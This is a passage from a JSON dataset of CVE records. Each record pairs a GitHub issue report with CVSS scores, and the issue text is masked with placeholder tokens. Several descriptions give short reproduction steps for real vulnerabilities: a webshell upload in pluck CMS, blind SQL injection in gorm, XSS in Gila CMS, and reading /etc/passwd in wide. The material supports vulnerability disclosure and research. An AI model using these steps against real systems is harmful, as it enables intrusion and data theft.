  89669. "description": "access violation APITAG in txt_add(unsigned char s, int sz). URLTAG (gdb) set args POC4 (gdb) r abcm2ps NUMBERTAG File POC4 Line NUMBERTAG Empty line in tune header K:C added Program received signal SIGSEGV, Segmentation fault. __memcpy_avx_unaligned () at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG d NUMBERTAG e3 in __memcpy_avx_unaligned () at PATHTAG NUMBERTAG e1b5b in txt_add (__len NUMBERTAG src NUMBERTAG f3e, __dest=<optimized out>) at PATHTAG NUMBERTAG e1b5b in txt_add (s NUMBERTAG f3e \"\", sz NUMBERTAG at APITAG NUMBERTAG e NUMBERTAG a in frontend (s=<optimized out>, s APITAG PATHTAG PATHTAG PATHTAG OB NUMBERTAG W PATHTAG PATHTAG \", ftype=ftype APITAG fname=fname APITAG \"POC4\", linenum NUMBERTAG linenum APITAG at APITAG NUMBERTAG b NUMBERTAG d in treat_file (fn=<optimized out>, ext=<optimized out>) at APITAG NUMBERTAG f9 in main (argc NUMBERTAG argv=<optimized out>) at APITAG",
  89670. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89671. "severity": "MEDIUM",
  89672. "baseScore": 5.5,
  89673. "impactScore": 3.6,
  89674. "exploitabilityScore": 1.8
  89675. },
  89676. {
  89677. "CVE_ID": "CVE-2019-10152",
  89678. "Issue_Url_old": "https://github.com/containers/libpod/issues/3211",
  89679. "Issue_Url_new": "https://github.com/containers/podman/issues/3211",
  89680. "Repo_new": "containers/podman",
  89681. "Issue_Created_At": "2019-05-28T15:33:18Z",
  89682. "description": "Podman cp dereferences symlinks in host context. Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line) /kind bug Description When copying into a path in a container that contains a symlink, the symlink is resolved on the host, not within the container, Steps to reproduce the issue NUMBERTAG APITAG NUMBERTAG Inside the container: APITAG NUMBERTAG Outside the container: APITAG NUMBERTAG In the container, APITAG NUMBERTAG Outside the container, APITAG Describe the results you received: Testfile is created outside the container Describe the results you expected: Testfile is created inside the container Additional information you deem important (e.g. issue happens only occasionally): Output of podman version : Latest master",
  89683. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
  89684. "severity": "HIGH",
  89685. "baseScore": 7.2,
  89686. "impactScore": 5.8,
  89687. "exploitabilityScore": 0.8
  89688. },
  89689. {
  89690. "CVE_ID": "CVE-2019-10742",
  89691. "Issue_Url_old": "https://github.com/axios/axios/issues/1098",
  89692. "Issue_Url_new": "https://github.com/axios/axios/issues/1098",
  89693. "Repo_new": "axios/axios",
  89694. "Issue_Created_At": "2017-09-22T06:34:42Z",
  89695. "description": "Download continues after APITAG exceeded. \u00a0Summary The following code demonstrates the issue: CODETAG Expected behavior: The script exits immediately after printing ERRORTAG APITAG size of NUMBERTAG exceeded\" Not much more than NUMBERTAG KB was downloaded from the server Actual behavior: The script prints ERRORTAG APITAG size of NUMBERTAG exceeded\", then continues to download the remaining NUMBERTAG MB of data from the server. It takes about two minutes before it exits on my connection. It's possible to work around this by adding a cancellation token and manually canceling the request when an error is encountered. However, since the request never actually fires a \"complete\" event, it's surprising that the download continues, only to have the data be thrown into the void. \u00a0Context axios version NUMBERTAG Environment: node NUMBERTAG APITAG Sierra NUMBERTAG",
  89696. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89697. "severity": "HIGH",
  89698. "baseScore": 7.5,
  89699. "impactScore": 3.6,
  89700. "exploitabilityScore": 3.9
  89701. },
  89702. {
  89703. "CVE_ID": "CVE-2019-11084",
  89704. "Issue_Url_old": "https://github.com/gbraad/gauth/issues/110",
  89705. "Issue_Url_new": "https://github.com/gbraad/gauth/issues/110",
  89706. "Repo_new": "gbraad/gauth",
  89707. "Issue_Created_At": "2018-08-22T08:21:45Z",
  89708. "description": "Self XSS. Minor security niggle but the name field is vulnerable to self XSS. No validation or escaping, so now the hosted copy plays me the Harlem Shake whenever I visit your site. This could be used by someone who obtains physical access to a machine, or malicious browser extension, to gain persistent access to users's TOTP codes. Indeed it could easily be scripted to immediately exfiltrate any new codes stored. Alternative, perhaps more plausible scenario is offering TOTP and providing a APITAG button to encourage them to copy the site name, and polluting the content of the copy and paste buffer with the attack code e.g. \" EMAILTAG xample.com APITAG \" The name should be properly escaped on output. Consider restricting the set of valid characters in the name. Consider using a Content Security Policy on the hosted copy to mitigate (and potentially detect via reporturi) existing and unforeseen XSS issues.",
  89709. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89710. "severity": "MEDIUM",
  89711. "baseScore": 6.1,
  89712. "impactScore": 2.7,
  89713. "exploitabilityScore": 2.8
  89714. },
  89715. {
  89716. "CVE_ID": "CVE-2019-11344",
  89717. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/72",
  89718. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/72",
  89719. "Repo_new": "pluck-cms/pluck",
  89720. "Issue_Created_At": "2019-04-09T14:45:54Z",
  89721. "description": "file upload vulnerability in PATHTAG Location: URLTAG Code: ERRORTAG When the uploaded file hits the suffix in APITAG , the file will be renamed to APITAG , and missed APITAG will not be renamed. So you can upload a webshell by overriding the APITAG file. Step1. Upload a file APITAG File content: image URLTAG Step2. Upload file APITAG File content: image URLTAG Step3. Request getshell URLTAG",
  89722. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89723. "severity": "CRITICAL",
  89724. "baseScore": 9.8,
  89725. "impactScore": 5.9,
  89726. "exploitabilityScore": 3.9
  89727. },
  89728. {
  89729. "CVE_ID": "CVE-2019-11470",
  89730. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1472",
  89731. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1472",
  89732. "Repo_new": "imagemagick/imagemagick",
  89733. "Issue_Created_At": "2019-02-05T04:29:35Z",
  89734. "description": "Incorrect parsing Cineon causing convert to take ridiculous time. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Cineon image may be mistakenly parsed with incorrect pixel information, causing converting to take too much CPU resource. Steps to Reproduce convert c.cin /tmp/test.tmp ERRORTAG FILETAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG b3bdb NUMBERTAG b) Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Version NUMBERTAG Q NUMBERTAG seems fine with error message \"width or height exceeds limit `c.cin'\". APITAG",
  89735. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89736. "severity": "MEDIUM",
  89737. "baseScore": 6.5,
  89738. "impactScore": 3.6,
  89739. "exploitabilityScore": 2.8
  89740. },
  89741. {
  89742. "CVE_ID": "CVE-2019-13038",
  89743. "Issue_Url_old": "https://github.com/Uninett/mod_auth_mellon/issues/35",
  89744. "Issue_Url_new": "https://github.com/uninett/mod_auth_mellon/issues/35",
  89745. "Repo_new": "uninett/mod_auth_mellon",
  89746. "Issue_Created_At": "2015-05-15T18:06:24Z",
  89747. "description": "Open Redirection issue. Hello, In IDP initiated login for Mellon, APITAG parameter could be really anything and that gets added as APITAG Once assertion is consumed, mellon redirects to APITAG arbitrarily. This leads to Open Redirect security issue. Ideally, redirection code should check if its in same domain. Can this be tracked? For example, URLTAG to IDP> Will redirect to Google after successful assertion. This would also lead to Phishing kind of attack.",
  89748. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89749. "severity": "MEDIUM",
  89750. "baseScore": 6.1,
  89751. "impactScore": 2.7,
  89752. "exploitabilityScore": 2.8
  89753. },
  89754. {
  89755. "CVE_ID": "CVE-2019-13617",
  89756. "Issue_Url_old": "https://github.com/nginx/njs/issues/174",
  89757. "Issue_Url_new": "https://github.com/nginx/njs/issues/174",
  89758. "Repo_new": "nginx/njs",
  89759. "Issue_Created_At": "2019-06-03T14:46:39Z",
  89760. "description": "heap buffer overflow in APITAG Hello, I am shuoz of alpha lab of topsec. I fuzz njs and found a heap overflow bug. ./njs FILETAG ERRORTAG pocfile: FILETAG",
  89761. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89762. "severity": "MEDIUM",
  89763. "baseScore": 6.5,
  89764. "impactScore": 3.6,
  89765. "exploitabilityScore": 2.8
  89766. },
  89767. {
  89768. "CVE_ID": "CVE-2019-13915",
  89769. "Issue_Url_old": "https://github.com/b3log/wide/issues/355",
  89770. "Issue_Url_new": "https://github.com/b3log/wide/issues/355",
  89771. "Repo_new": "b3log/wide",
  89772. "Issue_Created_At": "2019-05-15T15:44:13Z",
  89773. "description": "Vulnerability: read and write to any file. \u63cf\u8ff0\u95ee\u9898 Sensitive system files can be read through code or soft links. \u91cd\u73b0\u6b65\u9aa4 Method NUMBERTAG by code NUMBERTAG Writing code in the editor to read any file, such as /etc/passwd NUMBERTAG Click the green button at the top to compile and run about three times (I don't know why three NUMBERTAG etc/passwd will be read out Method NUMBERTAG by git or compressed file NUMBERTAG Create a soft link to a sensitive file, such as /etc/passwd, on a Linux APITAG NUMBERTAG compress the soft link APITAG NUMBERTAG upload zip and unzip it. when you open a link file, the local file that you point to is opened NUMBERTAG change and save the file if the user running wide has permission \u671f\u5f85\u7684\u7ed3\u679c Sensitive system files should not be read. \u622a\u5c4f\u6216\u5f55\u50cf FILETAG FILETAG",
  89774. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  89775. "severity": "HIGH",
  89776. "baseScore": 7.5,
  89777. "impactScore": 3.6,
  89778. "exploitabilityScore": 3.9
  89779. },
  89780. {
  89781. "CVE_ID": "CVE-2019-13984",
  89782. "Issue_Url_old": "https://github.com/directus/api/issues/981",
  89783. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/981",
  89784. "Repo_new": "directus/v8-archive",
  89785. "Issue_Created_At": "2019-05-28T20:28:44Z",
  89786. "description": "FILETAG A malicious user can use this functionality in order to upload a malicious file and to send it by a legitimate link to other victims and to attack them using their trust to the system. It was also found that file size limitations are permit to users upload large size files APITAG NUMBERTAG MB) in cases even when a size of uploaded file not required to be large as for example image for the user\u2019s avatar. FILETAG What problem does this feature solve? Fixes security hole. How do you think this should be implemented? Do now allow any access to uploaded files without any authentication. Restrict file extensions using whitelist approach. The file types allowed to be uploaded should be restricted to only those that are necessary for business functionality. The application should perform filtering and content checking on any files which are uploaded to the server. Files should be thoroughly scanned and validated before being made available to other users. Limit the file size to a reasonable maximum value in order to prevent denial of service attacks (on file space or other web application\u2019s functions such as the image resizer). Use a virus scanner on the server (if it is applicable). Or, if the contents of files are not confidential, a free virus scanner website can be used. In this case, file should be stored with a random name and without any extension on the server first, and after the virus checking (uploading to a free virus scanner website and getting back the result), it can be renamed to its specific name and extension. Implement an authorization mechanism that validate if user authorized to view or download the specific file. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  89787. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89788. "severity": "HIGH",
  89789. "baseScore": 8.8,
  89790. "impactScore": 5.9,
  89791. "exploitabilityScore": 2.8
  89792. },
  89793. {
  89794. "CVE_ID": "CVE-2019-15047",
  89795. "Issue_Url_old": "https://github.com/axiomatic-systems/bento4/issues/408",
  89796. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/408",
  89797. "Repo_new": "axiomatic-systems/bento4",
  89798. "Issue_Created_At": "2019-07-19T06:39:22Z",
  89799. "description": "2 Potential Buffer Overflow Vulnerabilities. bento4 version bento NUMBERTAG description APITAG download link FILETAG others please send email to EMAILTAG if you have any questions. APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp NUMBERTAG aac APITAG a.aac source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp NUMBERTAG aac NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp NUMBERTAG aac APITAG a.aac source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp NUMBERTAG aac NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG",
  89800. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89801. "severity": "HIGH",
  89802. "baseScore": 8.8,
  89803. "impactScore": 5.9,
  89804. "exploitabilityScore": 2.8
  89805. },
  89806. {
  89807. "CVE_ID": "CVE-2019-15048",
  89808. "Issue_Url_old": "https://github.com/axiomatic-systems/bento4/issues/409",
  89809. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/409",
  89810. "Repo_new": "axiomatic-systems/bento4",
  89811. "Issue_Created_At": "2019-07-31T05:24:56Z",
  89812. "description": "3 potential vulerabilities. bento4 version bento NUMBERTAG description txt None download link FILETAG others please send email to EMAILTAG if you have any questions. APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4compact APITAG a.mp4 source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4compact NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4compact verbose APITAG a.mp4 source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp4compact NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4compact verbose APITAG a.mp4 source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4compact NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG",
  89813. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89814. "severity": "HIGH",
  89815. "baseScore": 8.8,
  89816. "impactScore": 5.9,
  89817. "exploitabilityScore": 2.8
  89818. },
  89819. {
  89820. "CVE_ID": "CVE-2019-15562",
  89821. "Issue_Url_old": "https://github.com/go-gorm/gorm/issues/2517",
  89822. "Issue_Url_new": "https://github.com/go-gorm/gorm/issues/2517",
  89823. "Repo_new": "go-gorm/gorm",
  89824. "Issue_Created_At": "2019-06-21T08:54:24Z",
  89825. "description": "SQL injection in Gorm With using first and find.. What version of Go are you using ( go version )? latest Which database and its version are you using? postgress latest and gorm latest Blind Sql injection localhost NUMBERTAG user?id=id NUMBERTAG or NUMBERTAG ERRORTAG Need to runnable with FILETAG or please provides your config. ERRORTAG",
  89826. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89827. "severity": "CRITICAL",
  89828. "baseScore": 9.8,
  89829. "impactScore": 5.9,
  89830. "exploitabilityScore": 3.9
  89831. },
  89832. {
  89833. "CVE_ID": "CVE-2019-15939",
  89834. "Issue_Url_old": "https://github.com/OpenCV/opencv/issues/15287",
  89835. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15287",
  89836. "Repo_new": "opencv/opencv",
  89837. "Issue_Created_At": "2019-08-13T07:02:59Z",
  89838. "description": "Floating Point Exception in APITAG APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG LTS Compiler NUMBERTAG Detailed description An issue was discovered in openc NUMBERTAG There is a FPE in APITAG DEBUG CODETAG ASAN report ERRORTAG Steps to reproduce APITAG APITAG FILETAG",
  89839. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89840. "severity": "MEDIUM",
  89841. "baseScore": 5.9,
  89842. "impactScore": 3.6,
  89843. "exploitabilityScore": 2.2
  89844. },
  89845. {
  89846. "CVE_ID": "CVE-2019-16511",
  89847. "Issue_Url_old": "https://github.com/wixtoolset/issues/issues/6075",
  89848. "Issue_Url_new": "https://github.com/wixtoolset/issues/issues/6075",
  89849. "Repo_new": "wixtoolset/issues",
  89850. "Issue_Created_At": "2019-09-12T18:10:14Z",
  89851. "description": "DTF vulnerable to APITAG Slip\". Please provide answers to the following questions to help us narrow down, reproduce, and fix the problem. Fill out one section and delete the others. Which version of APITAG are you building with? > APITAG NUMBERTAG Which version of Visual Studio are you building with (if any)? > N/A Which version of the APITAG Toolset Visual Studio Extension are you building with (if any)? > N/A Which version of .NET are you building with? > Any If the problem occurs when installing your packages built with APITAG what is the version of Windows the package is running on? > N/A Describe the problem and the steps to reproduce it. > A maliciously crafted cabinet or zip file can be created with traversal paths in the archived file names. For example, APITAG . DTF's APITAG will concatenate the archived file path with a provided base directory, such that the traversal path can place the file outside the provided base directory and possibly overwriting the user's files. This is known as Zip Slip URLTAG . Describe the behavior you expected and how it differed from the actual behavior. > DTF should not write files outside the extraction folder. > This issue was originally reported by Devin Casadey.",
  89852. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  89853. "severity": "MEDIUM",
  89854. "baseScore": 5.5,
  89855. "impactScore": 3.6,
  89856. "exploitabilityScore": 1.8
  89857. },
  89858. {
  89859. "CVE_ID": "CVE-2019-17414",
  89860. "Issue_Url_old": "https://github.com/tinylcy/vino/issues/9",
  89861. "Issue_Url_new": "https://github.com/tinylcy/vino/issues/9",
  89862. "Repo_new": "tinylcy/vino",
  89863. "Issue_Created_At": "2019-09-12T05:23:13Z",
  89864. "description": "Application crashes when getting a long url.. Steps to reproduce: URLTAG Result: vn_get_string error: Resource temporarily unavailable.",
  89865. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89866. "severity": "HIGH",
  89867. "baseScore": 7.5,
  89868. "impactScore": 3.6,
  89869. "exploitabilityScore": 3.9
  89870. },
  89871. {
  89872. "CVE_ID": "CVE-2019-19011",
  89873. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/16",
  89874. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/16",
  89875. "Repo_new": "miniupnp/ngiflib",
  89876. "Issue_Created_At": "2019-10-30T18:20:15Z",
  89877. "description": "Segmentation Fault in ngiflib.c. We found Segmentation Fault issue in gif2tga binary and gif2tga is complied with clang enabling ASAN. Machine Setup Machine : Ubuntu NUMBERTAG LTS gcc version NUMBERTAG APITAG NUMBERTAG APITAG Commit NUMBERTAG d NUMBERTAG Command : ./gif2tga $POC POC : FILETAG ASAN Output ERRORTAG",
  89878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89879. "severity": "HIGH",
  89880. "baseScore": 7.5,
  89881. "impactScore": 3.6,
  89882. "exploitabilityScore": 3.9
  89883. },
  89884. {
  89885. "CVE_ID": "CVE-2019-20803",
  89886. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/56",
  89887. "Issue_Url_new": "https://github.com/gilacms/gila/issues/56",
  89888. "Repo_new": "gilacms/gila",
  89889. "Issue_Created_At": "2019-10-29T14:30:35Z",
  89890. "description": "Cross Site Scripting (XSS) . Describe the bug XSS when a admin click on the link bellow, the g_preview_theme parameter not encoding the double quotes, an attacker could trick the admin to click on that link.. URLTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' URLTAG NUMBERTAG Click on 'edit NUMBERTAG With a web proxy like burp intercept that request, and after id= parameter put \" \"+> APITAG alert NUMBERTAG APITAG NUMBERTAG See the alert on browser.. Screenshots If applicable, add screenshots to help explain your problem. Desktop (please complete the following information): Browser Firefox Version NUMBERTAG bit) Additional context In fact the attacker could trick any admin to click on URLTAG .. and execute javascript..",
  89891. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89892. "severity": "MEDIUM",
  89893. "baseScore": 6.1,
  89894. "impactScore": 2.7,
  89895. "exploitabilityScore": 2.8
  89896. },
  89897. {
  89898. "CVE_ID": "CVE-2019-6129",
  89899. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/269",
  89900. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/269",
  89901. "Repo_new": "glennrp/libpng",
  89902. "Issue_Created_At": "2019-01-05T07:23:28Z",
  89903. "description": "memory leak in png_create_info_struct. Hi,libpng team. there is a memory leak in the file APITAG of function png_create_info_struct. the bug is trigered by APITAG FILETAG the asan debug info is as follows: APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fe NUMBERTAG bf NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in png_create_info_struct PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). URLTAG",
  89904. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89905. "severity": "MEDIUM",
  89906. "baseScore": 6.5,
  89907. "impactScore": 3.6,
  89908. "exploitabilityScore": 2.8
  89909. },
  89910. {
  89911. "CVE_ID": "CVE-2019-6283",
  89912. "Issue_Url_old": "https://github.com/sass/libsass/issues/2814",
  89913. "Issue_Url_new": "https://github.com/sass/libsass/issues/2814",
  89914. "Repo_new": "sass/libsass",
  89915. "Issue_Created_At": "2019-01-14T05:26:25Z",
  89916. "description": "APITAG heap buffer overflow PATHTAG in APITAG const ). A heap buffer overflow in APITAG in APITAG const ) Compile and reproduce: APITAG ldd: $ ldd sassc linux APITAG NUMBERTAG fffc NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG a5d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG lib NUMBERTAG ld linu NUMBERTAG so NUMBERTAG f NUMBERTAG System information: APITAG Version: libsass NUMBERTAG sassc NUMBERTAG Poc: FILETAG Run: APITAG ASAN: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ac at pc NUMBERTAG dfd bp NUMBERTAG ffcd8af NUMBERTAG sp NUMBERTAG ffcd8af NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ac thread T NUMBERTAG dfc in APITAG const ) PATHTAG NUMBERTAG fd1 in char const APITAG APITAG &(char const APITAG const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG &(char const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG const APITAG &(char const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const )), &(char const APITAG const APITAG const APITAG const )), &(char const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG a6 in char const APITAG const APITAG const APITAG &(char const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const )), &(char const APITAG const APITAG const APITAG const )), &(char const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG a6 in APITAG const ) PATHTAG NUMBERTAG fedcc in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG ea NUMBERTAG f in APITAG PATHTAG NUMBERTAG d5b in APITAG const&, APITAG const&) PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG ) PATHTAG NUMBERTAG b NUMBERTAG in sass_compiler_parse PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG , APITAG ) PATHTAG NUMBERTAG b NUMBERTAG ac in sass_compile_data_context PATHTAG NUMBERTAG a NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG aad NUMBERTAG in _start ( PATHTAG NUMBERTAG ac is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in realloc PATHTAG NUMBERTAG a6f NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG const ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG e NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fd fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fa fa fa fd fd fd fa fa fa fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  89917. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89918. "severity": "MEDIUM",
  89919. "baseScore": 6.5,
  89920. "impactScore": 3.6,
  89921. "exploitabilityScore": 2.8
  89922. },
  89923. {
  89924. "CVE_ID": "CVE-2019-6292",
  89925. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/657",
  89926. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/657",
  89927. "Repo_new": "jbeder/yaml-cpp",
  89928. "Issue_Created_At": "2019-01-02T14:29:02Z",
  89929. "description": "Recursive Stack Frames: APITAG APITAG APITAG APITAG APITAG Hi there, An issue was discovered in APITAG as distributed in yaml cpp NUMBERTAG Stack Exhaustion occurs in the APITAG and there is a stack consumption problem caused by recursive stack frames: APITAG APITAG APITAG APITAG APITAG Here is the POC file. Please use \"./parse $POC\" to reproduce the bug FILETAG $git log ERRORTAG I have confirmed them with address sanitizer too. ERRORTAG",
  89930. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89931. "severity": "MEDIUM",
  89932. "baseScore": 6.5,
  89933. "impactScore": 3.6,
  89934. "exploitabilityScore": 2.8
  89935. },
  89936. {
  89937. "CVE_ID": "CVE-2019-6439",
  89938. "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2032",
  89939. "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2032",
